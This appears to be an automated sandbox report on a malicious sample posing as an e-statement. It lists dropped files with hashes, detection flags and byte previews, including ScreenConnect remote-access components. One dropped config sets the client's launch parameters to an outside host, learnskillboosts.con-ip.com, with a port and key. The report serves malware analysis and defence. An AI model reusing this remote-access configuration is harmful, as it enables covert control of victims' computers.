                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):68096
                                                                    Entropy (8bit):6.06942231395039
                                                                    Encrypted:false
                                                                    SSDEEP:1536:+A0ZscQ5V6TsQqoSD6h6+39QFVIl1zJhb8gq:p0Zy3gUOQFVQzJq
                                                                    MD5:5DB908C12D6E768081BCED0E165E36F8
                                                                    SHA1:F2D3160F15CFD0989091249A61132A369E44DEA4
                                                                    SHA-256:FD5818DCDF5FC76316B8F7F96630EC66BB1CB5B5A8127CF300E5842F2C74FFCA
                                                                    SHA-512:8400486CADB7C07C08338D8876BC14083B6F7DE8A8237F4FE866F4659139ACC0B587EB89289D281106E5BAF70187B3B5E86502A2E340113258F03994D959328D
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...nu............" ..0.............. ... ...@....... ..............................p.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):95512
                                                                    Entropy (8bit):6.504684691533346
                                                                    Encrypted:false
                                                                    SSDEEP:1536:Eg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkggU0HMx790K:dhbNDxZGXfdHrX7rAc6myJkggU0HqB
                                                                    MD5:75B21D04C69128A7230A0998086B61AA
                                                                    SHA1:244BD68A722CFE41D1F515F5E40C3742BE2B3D1D
                                                                    SHA-256:F1B5C000794F046259121C63ED37F9EFF0CFE1258588ECA6FD85E16D3922767E
                                                                    SHA-512:8D51B2CD5F21C211EB8FEA4B69DC9F91DFFA7BB004D9780C701DE35EAC616E02CA30EF3882D73412F7EAB1211C5AA908338F3FA10FDF05B110F62B8ECD9D24C2
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................>)....@.................................p...x....`..P............L...)...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):548864
                                                                    Entropy (8bit):6.034211651049746
                                                                    Encrypted:false
                                                                    SSDEEP:12288:xC2YKhQCNc6kVTplfWL/YTHUYCBdySISYz:HhE6O7WL/EC
                                                                    MD5:14E7489FFEBBB5A2EA500F796D881AD9
                                                                    SHA1:0323EE0E1FAA4AA0E33FB6C6147290AA71637EBD
                                                                    SHA-256:A2E9752DE49D18E885CBD61B29905983D44B4BC0379A244BFABDAA3188C01F0A
                                                                    SHA-512:2110113240B7D803D8271139E0A2439DBC86AE8719ECD8B132BBDA2520F22DC3F169598C8E966AC9C0A40E617219CB8FE8AAC674904F6A1AE92D4AC1E20627CD
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............." ..0..X...........s... ........... ..............................].....@.................................as..O.......t............................r..8............................................ ............... ..H............text....W... ...X.................. ..`.rsrc...t............Z..............@..@.reloc...............^..............@..B.................s......H........C..,/..................Dr........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1721856
                                                                    Entropy (8bit):6.639085961200334
                                                                    Encrypted:false
                                                                    SSDEEP:24576:dx5xeYkYFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:dx5xTkYJkGYYpT0+TFiH7efP
                                                                    MD5:9AD3964BA3AD24C42C567E47F88C82B2
                                                                    SHA1:6B4B581FC4E3ECB91B24EC601DAA0594106BCC5D
                                                                    SHA-256:84A09ED81AFC5FF9A17F81763C044C82A2D9E26F852DE528112153EE9AB041D0
                                                                    SHA-512:CE557A89C0FE6DE59046116C1E262A36BBC3D561A91E44DCDA022BEF72CB75742C8B01BEDCC5B9B999E07D8DE1F94C665DD85D277E981B27B6BFEBEAF9E58097
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y............." ..0..>..........~]... ...`....... ..............................8.....@.................................+]..O....`..|............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc...|....`.......@..............@..@.reloc...............D..............@..B................_]......H.......t...d..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):260168
                                                                    Entropy (8bit):6.416438906122177
                                                                    Encrypted:false
                                                                    SSDEEP:3072:qJvChyA4m2zNGvxDd6Q6dtaVNVrlaHpFahvJ9ERnWtMG8Ff2lt9Bgcld5aaYxg:0IvxDdL6d8VNdlC3g0RCXh5D
                                                                    MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                                                    SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                                                    SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                                                    SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A........................T....................V.......V.......V......................=U......=U......=U$.....=U......Rich....................PE..d.....Qf.........." ...'.^...^.......................................................(....`..........................................e.......f..P................ ......HP..........P%..p............................$..@............p...............................text...t].......^.................. ..`.rdata.......p.......b..............@..@.data....+...........d..............@....pdata... ......."...x..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):61208
                                                                    Entropy (8bit):6.310126082367387
                                                                    Encrypted:false
                                                                    SSDEEP:1536:kW/+lo6MOc8IoiKWjrNv8DtyQ4RE+TC6WAhVbb57bP8:kLlo6dccldyQGWy5s
                                                                    MD5:AFA97CAF20F3608799E670E9D6253247
                                                                    SHA1:7E410FDE0CA1350AA68EF478E48274888688F8EE
                                                                    SHA-256:E25F32BA3FA32FD0DDD99EB65B26835E30829B5E4B58573690AA717E093A5D8F
                                                                    SHA-512:FE0B378651783EF4ADD3851E12291C82EDCCDE1DBD1FA0B76D7A2C2DCD181E013B9361BBDAE4DAE946C0D45FB4BF6F75DC027F217326893C906E47041E3039B0
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....c+..........."...0.................. ........@.. ....................... .......r....@.....................................O....... ................)..............8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):266
                                                                    Entropy (8bit):4.842791478883622
                                                                    Encrypted:false
                                                                    SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                    MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                    SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                    SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                    SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):602392
                                                                    Entropy (8bit):6.176232491934078
                                                                    Encrypted:false
                                                                    SSDEEP:6144:fybAk1FVMVTZL/4TvqpU0pSdRW3akod1sI5mgve8mZXuRFtSc4q2/R4IEyxuV5AN:qbAOwJ/MvIFptJoR5NmtiFsxsFE
                                                                    MD5:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                    SHA1:0203B65E92D2D1200DD695FE4C334955BEFBDDD3
                                                                    SHA-256:600CF10E27311E60D32722654EF184C031A77B5AE1F8ABAE8891732710AFEE31
                                                                    SHA-512:A902080FF8EE0D9AEFFA0B86E7980457A4E3705789529C82679766580DF0DC17535D858FBE50731E00549932F6D49011868DEE4181C6716C36379AD194B0ED69
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ... ....@.. .......................`............@.................................M...O.... ...................)...@..........8............................................ ............... ..H............text...p.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......XJ......................$.........................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):266
                                                                    Entropy (8bit):4.842791478883622
                                                                    Encrypted:false
                                                                    SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                    MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                    SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                    SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                    SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                    Malicious:true
                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):842248
                                                                    Entropy (8bit):6.268561504485627
                                                                    Encrypted:false
                                                                    SSDEEP:12288:q9vy8YABMuiAoPyEIrJs7jBjaau+EAaMVtw:P8Y4MuiAoPyZrJ8jrvDVtw
                                                                    MD5:BE74AB7A848A2450A06DE33D3026F59E
                                                                    SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
                                                                    SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
                                                                    SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}....}H..}H..}H.d~I..}H.dxIG.}H.dyI..}H..xI..}H..yI..}H..~I..}H..|H8.}H..}H..}H2.}I..}H2..I..}HRich..}H........PE..d.....Gf.........." ...'.P...........H....................................... ......q.....`......................................... ...t....................P...y.......(......,4.....T.......................(.......@............`...............................text....O.......P.................. ..`.rdata...z...`...|...T..............@..@.data....d.......0..................@....pdata...y...P...z..................@..@_RDATA...............z..............@..@.reloc..,4.......6...|..............@..B................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):81688
                                                                    Entropy (8bit):5.8618809599146005
                                                                    Encrypted:false
                                                                    SSDEEP:1536:Ety9l44Kzb1I5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7j27Vy:PvqukLdn2s
                                                                    MD5:1AEE526DC110E24D1399AFFCCD452AB3
                                                                    SHA1:04DB0E8772933BC57364615D0D104DC2550BD064
                                                                    SHA-256:EBD04A4540D6E76776BD58DEEA627345D0F8FBA2C04CC65BE5E979A8A67A62A1
                                                                    SHA-512:482A8EE35D53BE907BE39DBD6C46D1F45656046BACA95630D1F07AC90A66F0E61D41F940FB166677AC4D5A48CF66C28E76D89912AED3D673A80737732E863851
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....o..........."...0..@...........^... ...`....@.. .......................`.......$....@..................................^..O....`...................)...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):266
                                                                    Entropy (8bit):4.842791478883622
                                                                    Encrypted:false
                                                                    SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                    MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                    SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                    SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                    SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:XML 1.0 document, ASCII text, with very long lines (469), with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):959
                                                                    Entropy (8bit):5.754761962775855
                                                                    Encrypted:false
                                                                    SSDEEP:24:2dL9hK6E4dl/mr3GuXJXQ3DwZl97+O2rwvYPb9SvH:chh7HHEZXYET9KO2rwScv
                                                                    MD5:B9D5F16BF423DE0D69D5FFC0CC968C90
                                                                    SHA1:1899CE465AE071A6B983528BFDEBC92D8EE8E6B3
                                                                    SHA-256:579D5CB15C36F0D2B63B8AF1425AA592D533A96BC52470CFD7EA6AA9FDBA51A2
                                                                    SHA-512:3CAAD3CC5A7CC4CC0FF2692A24F7D237960F34EF81AF2D84FFF59C6A75251FFE40C0080DDE1BBA38B77783895CE91741E0306180500CCF27677289A970CF2396
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=learnskillboosts.con-ip.com&amp;p=8041&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQDh9vKuLEL1L4HK6ORtVBsB%2bthOksnlK7Ue9qyl%2f0hx9D6Dat7da%2fwWDSnfFAil7wZKoZkfGeFuVZh3db2B%2fNSvW1GbYYRU0i1tb65QvaGA%2fLvqINqA%2fMRlkTLEsdJ%2fbBxBWucr3qLZST6J6zV5%2bJ3YeRZg2t2x3hg00znLoKDHzKrITuiILcoCFsdX8uO3NTl2K0LkUPBJEwrHeKYioqGccrKSxO68%2fPJLrw6iaEa%2fbdf3oiyw%2fF5lubvyzuV43Lm%2b7jGQuatswnq0I7edWlBMXC6AaGp4XFBg3ZW%2fLZs6BDLgcD1KTXwQtIgJkldweisogA4AWx5bvaiCcsnM3YGx</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):1310720
                                                                    Entropy (8bit):0.8008220442801065
                                                                    Encrypted:false
                                                                    SSDEEP:1536:CJD1YBdWK7S50AhnZ0Ag0ALzJVEbJBJlPVPEH3cNkPfF7Njg9QaQfOgFrGXuE5T6:CJC5rk0X+MbJ72D4qgfiaDhvO7VMBfx
                                                                    MD5:FCE408B24DBD3A2A28718FEAF503AF86
                                                                    SHA1:8495D2D7569DACEFB7E161782A1341E350BDFFC0
                                                                    SHA-256:3B50D44A666D45AE2883828A3CC38CB32A07224E7FBF95E0A34886D6B3C4BCFE
                                                                    SHA-512:4771316027CBFF6B0C6F540681B3B9B61DEC11279BE698DC798073A388C000F992632299CF75D7CCCF9E6194BD8A4763844DE0BB9405020D8304A84AD3248686
                                                                    Malicious:false
                                                                    Preview:dg".........@..@%9...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................T.....#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x4e3631e2, page size 16384, DirtyShutdown, Windows version 10.0
                                                                    Category:dropped
                                                                    Size (bytes):1310720
                                                                    Entropy (8bit):0.7715990559456841
                                                                    Encrypted:false
                                                                    SSDEEP:1536:7SB2ESB2SSjlK/7vqlC06Z546I50AEzJ+Ykr3g16XWq2UPkLk+kFLKho38o38+W6:7aza9vqcHbrq2UyUVWlW
                                                                    MD5:69B0CCA89466C7BFF062B5E12D68F106
                                                                    SHA1:C3D1529B7746980F9F5ACBD79DAD1E1716045FF2
                                                                    SHA-256:641736AE43BA41BF5272249B64D9EF9E2FDEC247314C6E8F5A66F17D1AB18B10
                                                                    SHA-512:465B48D3627E56BCCB5B390BF7DC33A9C6727F6A0F7CCBA537B07590B8951BCC950DD6464EBBF2727E78704D87C85ADA9A37365B989C885B7258340E202A9DCC
                                                                    Malicious:false
                                                                    Preview:N61.... ...............X\...;...{......................0.p.....#....{...3...|..h.r.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......%9...{...............................................................................................................................................................................................2...{..................................+z.,.3...|.....................;.3...|...........................#......h.r.....................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):16384
                                                                    Entropy (8bit):0.081668368592031
                                                                    Encrypted:false
                                                                    SSDEEP:3:y/l/KYeJSQl08qrrvr+gvrr/8WIo9lallVmctlll/Sm1l1:y1KzJSErgn/HIo9ALPPv
                                                                    MD5:078005BA85ACD01A3362D66069E3B856
                                                                    SHA1:C01D5C5261D49121DB4902FFCBFB9FF59BFC3CFE
                                                                    SHA-256:32E01C00E3716B386789ABA83FA4C5DF9A228B36FAD7F889B97AEA1392AE1854
                                                                    SHA-512:13AC2BBBB21EB7607C067969F0AA2342DC474209B439A49A5803DF27947D73274810015ADFAD2497C262FCE1985961D6A213E5DDDB93D2E32076C412065DA1DD
                                                                    Malicious:false
                                                                    Preview:.V.d.....................................;...{...3...|..#....{..........#....{..#....{...i..#....{.V...................;.3...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\estatement020134230003.exe.virus.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):321
                                                                    Entropy (8bit):5.36509199858051
                                                                    Encrypted:false
                                                                    SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTrM3RJoDLIP12MUAvvR+uCv:Q3La/KDLI4MWuPTArkvoDLI4MWuCv
                                                                    MD5:1CF2352B684EF57925D98E766BA897F2
                                                                    SHA1:6E8CB2C1143E9D9D1211BAA811FE4CAA49C08B55
                                                                    SHA-256:43C3FB3C0B72A899C5442DAC8748D019D800E0A9421D3677EB96E196ED285290
                                                                    SHA-512:9F2D6F89453C867386A65A04FF96067FC3B23A99A4BCE0ECD227E130F409069FE6DD202D4839CBF204C3F204EC058D6CDFDADA7DD212BC2356D74FEC97F22061
                                                                    Malicious:true
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):746
                                                                    Entropy (8bit):5.349174276064173
                                                                    Encrypted:false
                                                                    SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yirkvoDLb:ML9E4KlKDE4KhKiKhPKIE4oKNzKogE4P
                                                                    MD5:ED994980CB1AABB953B2C8ECDC745E1F
                                                                    SHA1:9E9D3E00A69FC862F4D3C30F42BF26693A2D2A21
                                                                    SHA-256:D23B54CCF9F6327FE1158762D4E5846649699A7B78418D056A197835ED1EBE79
                                                                    SHA-512:61DFC93154BCD734B9836A6DECF93674499FF533E2B9A1188886E2CBD04DF35538368485AA7E775B641ADC120BAE1AC2551B28647951C592AA77F6747F0E9187
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                    Process:C:\Windows\SysWOW64\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                    Category:dropped
                                                                    Size (bytes):1088392
                                                                    Entropy (8bit):7.789940577622617
                                                                    Encrypted:false
                                                                    SSDEEP:24576:QUUGGHn+rUGemcPe9MpKL4Plb2sZWV+tLv0QYu5OPthT+gd:jGHpRPqMpvlqs0O4iO2k
                                                                    MD5:8A8767F589EA2F2C7496B63D8CCC2552
                                                                    SHA1:CC5DE8DD18E7117D8F2520A51EDB1D165CAE64B0
                                                                    SHA-256:0918D8AB2237368A5CEC8CE99261FB07A1A1BEEDA20464C0F91AF0FE3349636B
                                                                    SHA-512:518231213CA955ACDF37B4501FDE9C5B15806D4FC166950EB8706E8D3943947CF85324FAEE806D7DF828485597ECEFFCFA05CA1A5D8AB1BD51ED12DF963A1FE4
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):234
                                                                    Entropy (8bit):4.977464602412109
                                                                    Encrypted:false
                                                                    SSDEEP:6:JiMVBdTMkIffVymRMT4/0xC/C7VrfC7VNQpuAW4QIT:MMHd413VymhsS+Qg93xT
                                                                    MD5:6F52EBEA639FD7CEFCA18D9E5272463E
                                                                    SHA1:B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
                                                                    SHA-256:7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
                                                                    SHA-512:B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
                                                                    Malicious:false
                                                                    Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>..</configuration>
